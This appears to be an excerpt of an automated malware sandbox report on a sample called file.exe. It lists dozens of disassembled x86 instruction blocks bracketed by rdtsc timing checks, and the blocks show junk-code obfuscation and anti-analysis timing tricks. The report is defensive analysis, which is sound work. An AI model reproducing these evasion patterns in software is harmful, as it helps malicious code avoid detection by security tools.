Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D86A8D second address: D86A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D86C8E second address: D86C94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D87C4F second address: D87C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D88A76 second address: D88A80 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F99D0DE6F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D88A80 second address: D88A86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D87C53 second address: D87CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a stc 0x0000000b push dword ptr fs:[00000000h] 0x00000012 and edi, dword ptr [ebp+122D2C9Bh] 0x00000018 jbe 00007F99D0DE6F2Eh 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F99D0DE6F28h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f pushad 0x00000040 jl 00007F99D0DE6F2Ch 0x00000046 mov esi, dword ptr [ebp+122D2B97h] 0x0000004c mov dword ptr [ebp+122D312Dh], eax 0x00000052 popad 0x00000053 mov eax, dword ptr [ebp+122D0D85h] 0x00000059 mov ebx, edi 0x0000005b push FFFFFFFFh 0x0000005d mov edi, dword ptr [ebp+124655B3h] 0x00000063 nop 0x00000064 pushad 0x00000065 jnc 00007F99D0DE6F2Ch 0x0000006b jmp 00007F99D0DE6F32h 0x00000070 popad 0x00000071 push eax 0x00000072 pushad 0x00000073 jmp 00007F99D0DE6F2Ah 0x00000078 push esi 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D88A86 second address: D88A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D88A8A second address: D88B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F99D0DE6F2Eh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F99D0DE6F28h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c jnl 00007F99D0DE6F2Ch 0x00000032 and edi, dword ptr [ebp+122D297Fh] 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D33B9h], edi 0x00000040 push 00000000h 0x00000042 sub dword ptr [ebp+122D33B9h], esi 0x00000048 push eax 0x00000049 pushad 0x0000004a jmp 00007F99D0DE6F30h 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F99D0DE6F2Bh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D88CC8 second address: D88CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8BB8C second address: D8BB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8C176 second address: D8C192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D212 second address: D8D21C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99D0DE6F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D21C second address: D8D272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D3814h], ecx 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 mov eax, dword ptr [ebp+1245B9ABh] 0x00000018 mov edx, 3F24838Bh 0x0000001d popad 0x0000001e push 00000000h 0x00000020 jmp 00007F99D0D12E22h 0x00000025 xchg eax, esi 0x00000026 jng 00007F99D0D12E2Ch 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 pop edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8C35C second address: D8C36C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99D0DE6F2Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8E255 second address: D8E25F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8E25F second address: D8E265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8E265 second address: D8E269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D3B3 second address: D8D3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D900B8 second address: D90130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 jmp 00007F99D0D12E23h 0x0000000d pop edi 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F99D0D12E18h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F99D0D12E18h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 push 00000000h 0x00000047 mov ebx, edi 0x00000049 pushad 0x0000004a mov si, dx 0x0000004d xor dword ptr [ebp+12470F18h], ebx 0x00000053 popad 0x00000054 xchg eax, esi 0x00000055 push ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 push edx 0x00000059 pop edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D90130 second address: D90146 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F99D0DE6F2Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D90146 second address: D9014C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9014C second address: D90150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9112F second address: D91134 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D91FD1 second address: D9201C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 adc ebx, 4B9FD111h 0x0000000f push 00000000h 0x00000011 xor dword ptr [ebp+122D17C2h], eax 0x00000017 mov ebx, 33F176F7h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F99D0DE6F28h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 mov ebx, dword ptr [ebp+122D2A73h] 0x0000003e push eax 0x0000003f push eax 0x00000040 pushad 0x00000041 jbe 00007F99D0DE6F26h 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9025D second address: D90261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D90261 second address: D9027D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9027D second address: D90282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D90282 second address: D90288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D93DF4 second address: D93E70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F99D0D12E18h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000000h 0x00000029 mov ebx, 1A55EA9Bh 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F99D0D12E18h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a jnp 00007F99D0D12E22h 0x00000050 jc 00007F99D0D12E1Ch 0x00000056 sub dword ptr [ebp+122D36A7h], edi 0x0000005c mov edi, dword ptr [ebp+124656F1h] 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 push ecx 0x00000067 pop ecx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D93E70 second address: D93E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8F393 second address: D8F397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8F397 second address: D8F39D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D921CB second address: D921CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D96C09 second address: D96C18 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33D5C second address: D33D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D94EE7 second address: D94F13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007F99D0DE6F40h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F99D0DE6F32h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D99313 second address: D99318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FDA4 second address: D9FDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FDAA second address: D9FDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FDB2 second address: D9FDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FDB8 second address: D9FDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FDBE second address: D9FDCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F99D0DE6F26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FDCE second address: D9FDD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FDD2 second address: D9FDD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F4C7 second address: D9F4DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F4DA second address: D9F4DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F4DE second address: D9F4F3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F99D0D12E57h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F4F3 second address: D9F51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F99D0DE6F26h 0x0000000a jp 00007F99D0DE6F26h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F99D0DE6F39h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F980 second address: D9F988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F988 second address: D9F98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA5579 second address: DA5582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA5667 second address: DA56CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jno 00007F99D0DE6F2Ah 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007F99D0DE6F39h 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f jmp 00007F99D0DE6F35h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F99D0DE6F2Bh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA5770 second address: BBEA6B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 472AFCC5h 0x0000000f jmp 00007F99D0D12E1Eh 0x00000014 push dword ptr [ebp+122D13FDh] 0x0000001a clc 0x0000001b call dword ptr [ebp+122D3960h] 0x00000021 pushad 0x00000022 mov dword ptr [ebp+122D2374h], eax 0x00000028 xor eax, eax 0x0000002a je 00007F99D0D12E1Eh 0x00000030 jmp 00007F99D0D12E20h 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 jmp 00007F99D0D12E1Dh 0x0000003e mov dword ptr [ebp+122D2CCFh], eax 0x00000044 pushad 0x00000045 pushad 0x00000046 xor edi, dword ptr [ebp+122D2CB7h] 0x0000004c popad 0x0000004d mov si, di 0x00000050 popad 0x00000051 mov esi, 0000003Ch 0x00000056 mov dword ptr [ebp+122D285Ah], eax 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 jmp 00007F99D0D12E27h 0x00000065 lodsw 0x00000067 jg 00007F99D0D12E1Ch 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jno 00007F99D0D12E1Ch 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b jp 00007F99D0D12E1Ch 0x00000081 mov dword ptr [ebp+122D2374h], ebx 0x00000087 nop 0x00000088 push eax 0x00000089 push edx 0x0000008a pushad 0x0000008b pushad 0x0000008c popad 0x0000008d jmp 00007F99D0D12E23h 0x00000092 popad 0x00000093 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2D330 second address: D2D334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2D334 second address: D2D354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F99D0D12E22h 0x0000000c jmp 00007F99D0D12E1Ch 0x00000011 jp 00007F99D0D12E22h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2D354 second address: D2D362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F99D0DE6F26h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2D362 second address: D2D36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F99D0D12E16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2D36C second address: D2D372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA3B2 second address: DAA3F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jmp 00007F99D0D12E25h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push esi 0x00000019 jno 00007F99D0D12E16h 0x0000001f jmp 00007F99D0D12E1Dh 0x00000024 pop esi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA3F3 second address: DAA3F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA580 second address: DAA586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA586 second address: DAA5B2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99D0DE6F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F99D0DE6F36h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA763 second address: DAA773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0D12E1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA773 second address: DAA777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA777 second address: DAA792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F99D0D12E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 popad 0x00000011 jnp 00007F99D0D12E26h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA792 second address: DAA798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAAA2A second address: DAAA30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAAA30 second address: DAAA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAAA36 second address: DAAA3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAAA3A second address: DAAA61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99D0DE6F36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAAA61 second address: DAAA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F99D0D12E16h 0x0000000a popad 0x0000000b jc 00007F99D0D12E18h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAF498 second address: DAF4C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F99D0DE6F2Ch 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAF4C0 second address: DAF4C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAF771 second address: DAF79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0DE6F31h 0x00000009 popad 0x0000000a jmp 00007F99D0DE6F2Bh 0x0000000f push esi 0x00000010 jg 00007F99D0DE6F26h 0x00000016 pop esi 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAFB9F second address: DAFBA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAFBA3 second address: DAFBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB0223 second address: DB0238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E21h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB0238 second address: DB0267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 ja 00007F99D0DE6F28h 0x0000000e jc 00007F99D0DE6F2Ch 0x00000014 jo 00007F99D0DE6F26h 0x0000001a pushad 0x0000001b jmp 00007F99D0DE6F30h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB0758 second address: DB0763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F99D0D12E16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
